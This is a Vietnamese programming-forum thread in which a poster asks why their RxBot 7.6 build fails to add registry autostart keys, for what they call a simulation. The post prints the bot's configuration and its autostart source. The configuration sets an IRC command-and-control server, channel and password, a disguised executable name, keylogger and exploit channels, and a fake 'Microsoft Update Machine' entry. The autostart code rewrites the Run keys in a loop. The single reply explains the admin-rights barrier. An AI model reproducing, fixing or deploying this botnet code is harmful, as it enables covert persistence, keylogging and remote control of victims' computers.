Công cụ bảo vệ mã nguồn .NET mạnh nhất, không thể unpack, miễn phí cho các khách hàng đầu tiên đăng ký.
Từ 1 tới 2 trên tổng số 2 kết quả

Đề tài: [RxBot] Không thêm khóa vào registry đc

Hybrid View

  1. #1
    Ngày gia nhập
    02 2011
    Bài viết
    1

    Mặc định [RxBot] Không thêm khóa vào registry đc

    Mình đang xây dựng 1 mô phỏng, có sử dụng con bot rxbot để thả vào máy mô phỏng, mình dùng source bản 7.6, đã chạy được nhưng có 1 cái là nó không thêm khóa registry để tự động khởi động cùng windows được, mình không rõ là tại sao :'( mong các[COD] bạn chỉ giáo
    mình nghĩ nó chỉ có vấn đề ở thư viện configs.h và hàm autostart thôi, sau đây là đoạnc code của 2 cái này, ngoài ra mình có đính kèm source code nếu các bạn muốn xem thêm.
    Hy vọng được các bro chỉ giáo sớm :((
    configs.h
    Code:
    // bot configuration (Lsass by Uncanny) 
    int port = 6667;				// server port
    int port2 = 6667;				// backup server port
    int socks4port = 38;			// Port # for sock4 daemon to run on  - CHANGE THIS!!!
    int tftpport = 69;				// Port # for tftp daemon to run on
    int httpport = 81;			// Port # for http daemon to run on
    int rloginport = 37;			// Port # for rlogin daemon to run on
    BOOL topiccmd = TRUE;			// set to TRUE to enable topic commands
    BOOL rndfilename = TRUE;		// use random file name
    BOOL AutoStart = TRUE;			// enable autostart registry keys
    char prefix = '.';				// command prefix (one character max.)
    int maxrand = 6;				// how many random numbers in the nick
    int nicktype = CONSTNICK;		// nick type (see rndnick.h)
    BOOL nickprefix = TRUE;			// nick uptime & mirc prefix
    
    #ifdef DEBUG_LOGGING
    char logfile[]="c:\\debug.txt";
    #endif
    
    #ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
    
    #else  // Recommended to use this only for Crypt() setup, this is unsecure.
    
    char botid[] = "Bot";						// bot id
    char version[] = "[RxBot v7.6 modded by Tr0gd0r]";		// Bots !version reply
    char password[] = "1234";					// bot password
    char server[] = "aenigma.gotd.org";		// server
    char serverpass[] = "1234";						// server password
    char channel[] = "#bot1";				// channel that the bot should join
    char chanpass[] = "1234";						// channel password
    char server2[] = "";						// backup server (optional)
    char channel2[] = "";						// backup channel (optional)
    char chanpass2[] = "";						// backup channel password (optional)
    char filename[] = "winmgr.exe";			// destination file name
    char keylogfile[] = "system.txt";				// keylog filename
    char valuename[] = "Microsoft Update Machine";		// value name for autostart
    char nickconst[] = "n-";					// first part to the bot's nick
    char szLocalPayloadFile[]="msconfig.dat";	// Payload filename
    char modeonconn[] = "-x+B";					// Can be more than one mode and contain both + and -
    char exploitchan[] = "#bot1";					// Channel where exploit messages get redirected
    char keylogchan[] =  "#bot1"; 					// Channel where keylog messages get redirected
    char psniffchan[] = "#n";						// Channel where psniff messages get redirected 
    
    char *authost[] = {
    	"*@*",
    };
    
    char *versionlist[] = {
    	"mIRC v6.03 Khaled Mardam-Bey",
    	"mIRC v6.10 Khaled Mardam-Bey",
    	"mIRC v6.12 Khaled Mardam-Bey",
    	"mIRC v6.14 Khaled Mardam-Bey"
    };
    
    char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";
    char regkey3[]="Software\\Microsoft\\OLE";
    char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";
    
    #endif
    autostart.cpp
    Code:
    #include "includes.h"
    #include "functions.h"
    #include "externs.h"
    
    // globals
    #ifndef NO_REGISTRY
    int registry_delay=60000;
    #endif
    
    AUTOSTART autostart[]={
    	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey1},
    	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey2},
    	{HKEY_CURRENT_USER,(LPCTSTR)regkey1}
    };
    
    void AutoStartRegs(char *nfilename)
    {
    	HKEY key;
    
    	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
    		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
    		if (nfilename)
    			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
    		else
    			fRegDeleteValue(key, valuename); 
    		fRegCloseKey(key); 
    	}
       
    	return;
    }
    
    #ifndef NO_REGISTRY
    DWORD WINAPI AutoRegistry(LPVOID param)
    {
    	char *nfilename = (char *)param;
    
    	while (1) {
    		AutoStartRegs(nfilename);
    		Sleep(registry_delay);
    	}
    	return 0;
    }
    #endif
    Attached Files Attached Files

  2. #2
    Ngày gia nhập
    03 2009
    Bài viết
    128

    Đây là chức năng bảo mật mới của Microsoft, từ phiên bản window vista trở lên nếu muốn chỉnh sửa trong HKEY_LOCAL_MACHINE thì bạn phải chạy với quyền admin.

Các đề tài tương tự

  1. Cách Build Botnet/Virus Rxbot in VC++6.0 như thế nào?
    Gửi bởi hoangc5 trong diễn đàn Lập trình Virus & Anti-Virus
    Trả lời: 8
    Bài viết cuối: 29-03-2013, 04:37 PM
  2. Registry CleanUP 5 Suite 5.0.1.0(dọn dẹp registry để máy chạy nhanh hơn)
    Gửi bởi gioyeumay123 trong diễn đàn Software (Phần mềm) | Ebooks
    Trả lời: 0
    Bài viết cuối: 03-04-2012, 04:18 PM
  3. Thêm thuộc tính làm khóa chính trong thực thể
    Gửi bởi Sess_Kakashi trong diễn đàn Thắc mắc Microsoft SQL Server & Microsoft Access
    Trả lời: 0
    Bài viết cuối: 28-10-2011, 12:54 PM
  4. Database Báo lỗi Khóa Ngoại Khi Thêm CSDL Vào DataGridView
    Gửi bởi gait trong diễn đàn Thắc mắc lập trình C#
    Trả lời: 2
    Bài viết cuối: 20-04-2011, 12:14 AM
  5. học thêm 1 khóa lập trình .net ở đâu là tốt nhất (TP HCM) ?
    Gửi bởi Hianalyst trong diễn đàn Đào tạo CNTT
    Trả lời: 2
    Bài viết cuối: 16-08-2010, 12:57 PM

Quyền hạn của bạn

  • Bạn không thể gửi đề tài mới
  • Bạn không thể gửi bài trả lời
  • Bạn không thể gửi các đính kèm
  • Bạn không thể chỉnh sửa bài viết của bạn